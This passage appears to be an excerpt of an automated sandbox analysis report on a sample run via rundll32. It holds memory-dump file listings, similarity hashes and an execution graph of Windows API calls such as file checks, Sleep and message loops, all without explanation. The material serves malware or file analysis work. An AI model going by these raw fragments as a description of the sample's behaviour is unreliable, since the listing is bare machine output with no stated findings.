                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AttributesFile$DriveInformationTypeVolume
                          • String ID: 8dC
                          • API String ID: 2660071179-998101939
                          • Opcode ID: 03753d152c315a0f9aa2bccae41360c27fd1b09a45320341c8c03d75ba66dd4c
                          • Instruction ID: 486f2d80f4d3eed2484e1266edd3e8425bc97c3940d013daab9ec3d1af7560df
                          • Opcode Fuzzy Hash: 03753d152c315a0f9aa2bccae41360c27fd1b09a45320341c8c03d75ba66dd4c
                          • Instruction Fuzzy Hash: 2F519F72205A81DDDB20DF36D8923E92B65F74578CF549026EE8987B5ACF3EC248C358
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Info
                          • String ID: p.B
                          • API String ID: 1807457897-946182354
                          • Opcode ID: 22a003e79e028586990879ec0448b419a07bf0a70b4757dbf8ddc0b5b453196e
                          • Instruction ID: a55d62deaf6486fe7fa7546ebbf7f25a2866b087c327a76bd6636ebfb1b793b4
                          • Opcode Fuzzy Hash: 22a003e79e028586990879ec0448b419a07bf0a70b4757dbf8ddc0b5b453196e
                          • Instruction Fuzzy Hash: 3721E476A14B80CEDB14DF39D89029C3BA4F38478CF64511AEA4987B69CF34C596C784
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 0000000B.00000002.1845414480.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000B.00000002.1845335600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1845414480.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1845793801.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1845816303.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1845837162.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1845859028.000000000082A000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1845884413.000000000082B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1845904598.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1845924689.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1845944946.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1845967488.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1845987898.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846010930.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846031166.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846052110.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846074852.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846094101.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846117590.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846138203.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846155200.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846175760.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846195683.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846212571.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846231293.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846250891.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846269136.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846286867.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846305283.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846322846.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846339822.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846360668.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846377831.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846396801.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846396801.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846433210.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846451440.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846467324.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846484930.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846501929.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846521289.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846538104.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000B.00000002.1846538104.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_400000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7a7d775f2f31171e9fdc6f9a2d88efd9136b6ab3ceaa150b0c732618665457cd
                          • Instruction ID: 43e2e41ca933135a76ff93088d0e918a0ccdcc9e2d3f64ee52f22439fc26371c
                          • Opcode Fuzzy Hash: 7a7d775f2f31171e9fdc6f9a2d88efd9136b6ab3ceaa150b0c732618665457cd
                          • Instruction Fuzzy Hash: B6F01736601A85DACB24DF36E8807D83764F75938CF50402AFA5D87B18DB34C69ACB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:4.8%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:1598
                          Total number of Limit Nodes:2
                          execution_graph 6475 815f10 6497 80c650 6475->6497 6479 815f64 6517 4111e0 6479->6517 6481 815f79 6482 81602c GetMessageW 6481->6482 6521 436960 6481->6521 6484 816041 6482->6484 6485 81601a 6482->6485 6545 40fec0 6484->6545 6485->6482 6486 815faa 6488 815fba Sleep 6486->6488 6490 436960 4 API calls 6488->6490 6491 815fd3 6490->6491 6491->6482 6492 815fd7 6491->6492 6529 80fc70 6492->6529 6549 40fde0 6497->6549 6499 80c6ae 6502 4114b0 6499->6502 6500 80c667 6500->6499 6553 411240 6500->6553 6503 4114e9 6502->6503 6504 4114cf 6502->6504 6503->6479 6505 4114eb 6504->6505 6506 4114dc 6504->6506 6508 411507 6505->6508 6509 40c4c0 TlsGetValue 6505->6509 6591 410430 6506->6591 6597 4106d0 6508->6597 6509->6508 6513 411538 6516 4106d0 TlsGetValue 6513->6516 6514 411521 6514->6513 6515 4106d0 TlsGetValue 6514->6515 6515->6513 6516->6503 6518 4111f4 6517->6518 6519 4100a0 TlsGetValue 6518->6519 6520 411202 6519->6520 6520->6481 6628 411140 6521->6628 6523 436973 GetFileAttributesW 6524 436989 6523->6524 6525 436a4e GetLastError 6523->6525 6526 4369a6 CreateFileW 6524->6526 6528 436993 6524->6528 6525->6528 6527 4369e1 CloseHandle 6526->6527 6526->6528 6527->6528 6528->6486 6530 80fc91 6529->6530 6630 80c6c0 6530->6630 6533 40fde0 TlsGetValue 6534 80fcd5 6533->6534 6535 815b40 6534->6535 6536 815b5e 6535->6536 6537 815b70 Sleep 6536->6537 6538 815b85 6537->6538 6539 410430 TlsGetValue 6538->6539 6540 815bc4 6539->6540 6862 80f6d0 6540->6862 6543 40fec0 TlsGetValue 6544 815c03 6543->6544 6544->6482 6546 40fee2 6545->6546 6547 40fecf 6545->6547 6547->6546 6548 40fde0 TlsGetValue 6547->6548 6548->6547 6550 40fdf0 6549->6550 6551 40fe19 6549->6551 6550->6551 6557 409120 6550->6557 6551->6500 6554 41124f 6553->6554 6572 4100a0 6554->6572 6558 40912a 6557->6558 6559 40912e 6557->6559 6558->6551 6559->6558 6561 4093f0 6559->6561 6564 409390 6561->6564 6563 409401 6563->6558 6565 4093a8 6564->6565 6567 4093bc 6565->6567 6568 419650 6565->6568 6567->6563 6569 419682 6568->6569 6570 41965d 6568->6570 6569->6567 6570->6569 6571 419672 TlsGetValue 6570->6571 6571->6569 6573 4100bf 6572->6573 6575 4100c6 6572->6575 6578 40fcb0 6573->6578 6576 40fde0 TlsGetValue 6575->6576 6577 4100f4 6576->6577 6577->6499 6579 40fcdc 6578->6579 6580 40fcbd 6578->6580 6579->6575 6581 40fcca 6580->6581 6588 40c4c0 6580->6588 6584 4090f0 6581->6584 6585 4090fa 6584->6585 6586 4090fe 6584->6586 6585->6579 6586->6585 6587 4093f0 TlsGetValue 6586->6587 6587->6585 6589 409390 TlsGetValue 6588->6589 6590 40c4d3 6589->6590 6590->6581 6592 41044b 6591->6592 6596 41045d 6591->6596 6595 40fcb0 TlsGetValue 6592->6595 6592->6596 6593 40fde0 TlsGetValue 6594 410498 6593->6594 6594->6503 6595->6596 6596->6593 6613 410610 6597->6613 6600 4113d0 6601 4113f3 6600->6601 6602 4113e6 6600->6602 6604 411451 6601->6604 6605 411401 6601->6605 6603 40fde0 TlsGetValue 6602->6603 6610 4113ee 6603->6610 6606 40fcb0 TlsGetValue 6604->6606 6607 411416 6605->6607 6608 40c4c0 TlsGetValue 6605->6608 6611 411458 6606->6611 6619 409150 6607->6619 6608->6607 6610->6514 6611->6610 6612 40fde0 TlsGetValue 6611->6612 6612->6610 6614 410662 6613->6614 6615 410625 6613->6615 6614->6600 6615->6614 6616 40fcb0 TlsGetValue 6615->6616 6617 41063a 6616->6617 6618 40fde0 TlsGetValue 6617->6618 6618->6614 6620 40915f 6619->6620 6624 409199 6619->6624 6621 409164 6620->6621 6622 40917e 6620->6622 6623 40917c 6621->6623 6627 4093f0 TlsGetValue 6621->6627 6622->6623 6625 4093f0 TlsGetValue 6622->6625 6623->6610 6624->6623 6626 4093f0 TlsGetValue 6624->6626 6625->6623 6626->6623 6627->6623 6629 41114c 6628->6629 6629->6523 6651 4346d0 6630->6651 6634 80c771 6635 411190 TlsGetValue 6634->6635 6636 80c823 6634->6636 6666 4116b0 6634->6666 6669 435df0 6634->6669 6635->6634 6673 417900 6636->6673 6645 40fec0 TlsGetValue 6646 80c90f 6645->6646 6647 40fde0 TlsGetValue 6646->6647 6648 80c918 6647->6648 6694 40fe30 6648->6694 6652 4346e4 6651->6652 6653 4113d0 TlsGetValue 6652->6653 6654 4346f1 6653->6654 6655 410b90 6654->6655 6656 410bb3 6655->6656 6657 410ba6 6655->6657 6659 410bfd 6656->6659 6660 410bc1 6656->6660 6658 40fe30 TlsGetValue 6657->6658 6663 410bae 6658->6663 6698 40fd10 6659->6698 6662 409150 TlsGetValue 6660->6662 6662->6663 6663->6634 6664 410c07 6664->6663 6665 40fe30 TlsGetValue 6664->6665 6665->6663 6704 410dc0 6666->6704 6670 435e09 6669->6670 6671 435e2c 6670->6671 6715 434200 6670->6715 6671->6634 6674 40fe80 SysFreeString 6673->6674 6675 417924 6674->6675 6686 41799a 6675->6686 6835 411060 6675->6835 6676 40fe80 SysFreeString 6678 4179a4 6676->6678 6687 4112c0 6678->6687 6679 417946 6680 417984 6679->6680 6681 417974 6679->6681 6683 40fe80 SysFreeString 6680->6683 6682 411060 2 API calls 6681->6682 6684 417982 6682->6684 6683->6684 6841 4104f0 6684->6841 6686->6676 6688 4112ce 6687->6688 6689 4100a0 TlsGetValue 6688->6689 6690 4112e8 6689->6690 6691 40fe80 6690->6691 6692 40fe94 SysFreeString 6691->6692 6693 40fea8 6691->6693 6692->6693 6693->6645 6695 40fe40 6694->6695 6696 40fe69 6694->6696 6695->6696 6697 409120 TlsGetValue 6695->6697 6696->6533 6697->6696 6699 40fd20 6698->6699 6703 40fd44 6698->6703 6700 40fd2d 6699->6700 6701 40c4c0 TlsGetValue 6699->6701 6702 4090f0 TlsGetValue 6700->6702 6701->6700 6702->6703 6703->6664 6705 410e39 6704->6705 6706 410ded 6704->6706 6707 410e66 6705->6707 6708 410e3f 6705->6708 6706->6705 6711 40c4c0 TlsGetValue 6706->6711 6710 40fcb0 TlsGetValue 6707->6710 6709 4113d0 TlsGetValue 6708->6709 6713 410e56 6709->6713 6710->6713 6711->6706 6712 410ef0 6712->6634 6713->6712 6714 40fde0 TlsGetValue 6713->6714 6714->6712 6718 440c20 6715->6718 6717 43422a 6717->6671 6719 440c52 6718->6719 6728 417be0 6719->6728 6724 410430 TlsGetValue 6725 440c9c 6724->6725 6726 40fec0 TlsGetValue 6725->6726 6727 440cac 6726->6727 6727->6717 6729 417c0d 6728->6729 6736 417c47 6728->6736 6730 417c17 6729->6730 6731 417c49 6729->6731 6740 413d70 6730->6740 6733 4111e0 TlsGetValue 6731->6733 6733->6736 6734 417c22 6735 4100a0 TlsGetValue 6734->6735 6735->6736 6737 437d50 6736->6737 6795 437d80 6737->6795 6741 413d80 6740->6741 6742 413d9a 6740->6742 6741->6742 6744 413d10 6741->6744 6742->6734 6745 413d26 6744->6745 6746 413d45 6744->6746 6748 415580 GetModuleFileNameW 6745->6748 6746->6742 6749 411240 TlsGetValue 6748->6749 6750 4155d4 6749->6750 6751 4111e0 TlsGetValue 6750->6751 6752 4155e1 6751->6752 6759 415350 6752->6759 6754 4155f2 6755 40fec0 TlsGetValue 6754->6755 6756 415627 6755->6756 6757 40fde0 TlsGetValue 6756->6757 6758 415630 6757->6758 6758->6746 6760 4153b6 6759->6760 6761 40fde0 TlsGetValue 6760->6761 6762 4153cc 6761->6762 6763 41546e 6762->6763 6764 4104b0 TlsGetValue 6762->6764 6765 40fec0 TlsGetValue 6763->6765 6770 4153ea 6764->6770 6766 41551f 6765->6766 6767 40fec0 TlsGetValue 6766->6767 6769 415531 6767->6769 6768 41542c 6771 414f80 14 API calls 6768->6771 6769->6754 6770->6768 6772 4117a0 TlsGetValue 6770->6772 6773 415446 6771->6773 6772->6768 6774 415473 6773->6774 6775 41544d 6773->6775 6779 414710 14 API calls 6774->6779 6776 415110 FindFirstFileW FindClose TlsGetValue 6775->6776 6777 415461 6776->6777 6778 410430 TlsGetValue 6777->6778 6778->6763 6780 415483 6779->6780 6781 415110 FindFirstFileW FindClose TlsGetValue 6780->6781 6782 415497 6781->6782 6783 410430 TlsGetValue 6782->6783 6784 4154a4 6783->6784 6785 4154e8 6784->6785 6786 4154b7 GetSystemDefaultUILanguage 6784->6786 6785->6763 6787 415230 FindFirstFileW FindClose GetUserDefaultUILanguage GetLocaleInfoW TlsGetValue 6785->6787 6788 414710 14 API calls 6786->6788 6789 415502 6787->6789 6790 4154c7 6788->6790 6791 410430 TlsGetValue 6789->6791 6792 415110 FindFirstFileW FindClose TlsGetValue 6790->6792 6791->6763 6793 4154db 6792->6793 6794 410430 TlsGetValue 6793->6794 6794->6785 6798 437dd0 6795->6798 6799 437e15 6798->6799 6801 437e62 6799->6801 6811 437bf0 6799->6811 6802 437eee 6801->6802 6809 437e79 6801->6809 6803 4100a0 TlsGetValue 6802->6803 6805 437d6c 6803->6805 6804 437ee1 6807 4113d0 TlsGetValue 6804->6807 6805->6724 6806 40fde0 TlsGetValue 6806->6809 6807->6805 6808 4113d0 TlsGetValue 6808->6809 6809->6804 6809->6806 6809->6808 6810 437bf0 50 API calls 6809->6810 6810->6809 6814 438220 6811->6814 6815 43829d 6814->6815 6821 438294 6814->6821 6816 40fec0 TlsGetValue 6815->6816 6817 439114 6816->6817 6818 40fde0 TlsGetValue 6817->6818 6819 437c15 6818->6819 6819->6801 6820 411240 TlsGetValue 6820->6821 6821->6815 6821->6820 6822 411190 TlsGetValue 6821->6822 6823 4113b0 TlsGetValue 6821->6823 6824 4111b0 TlsGetValue 6821->6824 6825 411290 TlsGetValue 6821->6825 6826 435980 TlsGetValue 6821->6826 6827 435950 TlsGetValue 6821->6827 6828 4359e0 TlsGetValue 6821->6828 6829 4359c0 TlsGetValue 6821->6829 6830 4381c0 TlsGetValue 6821->6830 6831 437b40 50 API calls 6821->6831 6832 435dd0 18 API calls 6821->6832 6833 435db0 18 API calls 6821->6833 6834 439be0 18 API calls 6821->6834 6822->6821 6823->6821 6824->6821 6825->6821 6826->6821 6827->6821 6828->6821 6829->6821 6830->6821 6831->6821 6832->6821 6833->6821 6834->6821 6836 411072 6835->6836 6840 411079 6835->6840 6851 40fdb0 6836->6851 6855 410c80 6840->6855 6842 4104fc 6841->6842 6847 410506 6841->6847 6843 410501 6842->6843 6844 410508 6842->6844 6845 40fe80 SysFreeString 6843->6845 6846 41051b 6844->6846 6849 410522 6844->6849 6845->6847 6848 40fe80 SysFreeString 6846->6848 6847->6686 6848->6847 6849->6847 6850 40fd90 TlsGetValue 6849->6850 6850->6847 6852 40fdd4 6851->6852 6853 40fdbb 6851->6853 6852->6840 6853->6852 6859 40fd90 6853->6859 6856 410ca3 6855->6856 6857 410c9a 6855->6857 6856->6679 6858 40fe80 SysFreeString 6857->6858 6858->6856 6860 409390 TlsGetValue 6859->6860 6861 40fda3 6860->6861 6861->6852 6863 80f751 6862->6863 6864 410430 TlsGetValue 6863->6864 6865 80f77b 6864->6865 6866 410430 TlsGetValue 6865->6866 6867 80f798 6866->6867 6868 410430 TlsGetValue 6867->6868 6869 80f7b2 6868->6869 6870 410430 TlsGetValue 6869->6870 6871 80f7cf 6870->6871 6872 410430 TlsGetValue 6871->6872 6873 80f7ec 6872->6873 6913 4104b0 6873->6913 6878 4104b0 TlsGetValue 6879 80f825 6878->6879 6921 7f7550 6879->6921 6881 80f833 6925 411580 6881->6925 6886 411580 TlsGetValue 6887 80f883 6886->6887 6954 7f76b0 6887->6954 6893 80f8b5 6894 4111e0 TlsGetValue 6893->6894 6895 80f8da 6894->6895 6896 411580 TlsGetValue 6895->6896 6897 80f8fa 6896->6897 6898 4111e0 TlsGetValue 6897->6898 6899 80f90f 6898->6899 6900 80f918 Sleep 6899->6900 6901 4116b0 TlsGetValue 6900->6901 6902 80f94c 6901->6902 7007 813400 6902->7007 6907 40fec0 TlsGetValue 6908 80f9a1 6907->6908 6909 40fec0 TlsGetValue 6908->6909 6910 80f9b3 6909->6910 6911 40fec0 TlsGetValue 6910->6911 6912 80f9c5 Sleep 6911->6912 6912->6543 6914 4104c5 6913->6914 6915 40fde0 TlsGetValue 6914->6915 6916 4104e0 6915->6916 6917 437200 6916->6917 6918 43721e 6917->6918 7022 448740 6918->7022 6922 7f756a 6921->6922 7029 7fd270 6922->7029 6924 7f7596 6924->6881 6926 4115b0 6925->6926 6927 41159e 6925->6927 6929 4115b8 6926->6929 6930 4115ca 6926->6930 6928 410430 TlsGetValue 6927->6928 6933 4115ab 6928->6933 6934 410430 TlsGetValue 6929->6934 6931 4115d7 6930->6931 6932 4115e9 6930->6932 6935 4114b0 TlsGetValue 6931->6935 6936 4115f2 6932->6936 6937 41167e 6932->6937 6946 80c9f0 6933->6946 6934->6933 6935->6933 6938 411621 6936->6938 6940 40c4c0 TlsGetValue 6936->6940 6939 410430 TlsGetValue 6937->6939 6942 40fcb0 TlsGetValue 6938->6942 6941 41168b 6939->6941 6940->6938 6943 4114b0 TlsGetValue 6941->6943 6944 411628 6942->6944 6943->6933 6945 40fde0 TlsGetValue 6944->6945 6945->6933 6947 80ca1e 6946->6947 7065 511af0 6947->7065 6949 80ca60 7070 5119a0 6949->7070 6951 80cad1 6952 40fec0 TlsGetValue 6951->6952 6953 80caf7 6952->6953 6953->6886 6955 7f78b0 50 API calls 6954->6955 6957 7f76d1 6955->6957 6956 511410 57 API calls 6958 7f773c 6956->6958 6959 440a70 33 API calls 6957->6959 6960 7f76eb 6957->6960 7139 7f77a0 6958->7139 6959->6960 6960->6956 6963 7f8ba0 6964 7f8bb9 6963->6964 6965 7f8be7 6964->6965 6966 440a70 33 API calls 6964->6966 6967 7f8c27 6965->6967 7454 7f8030 6965->7454 6966->6965 6969 7f78b0 6967->6969 6970 411b70 TlsGetValue 6969->6970 6971 7f78d9 6970->6971 6972 411b70 TlsGetValue 6971->6972 6977 7f78ec 6972->6977 6973 7f7e29 6974 460d30 50 API calls 6973->6974 6975 7f7e57 6974->6975 6976 411d20 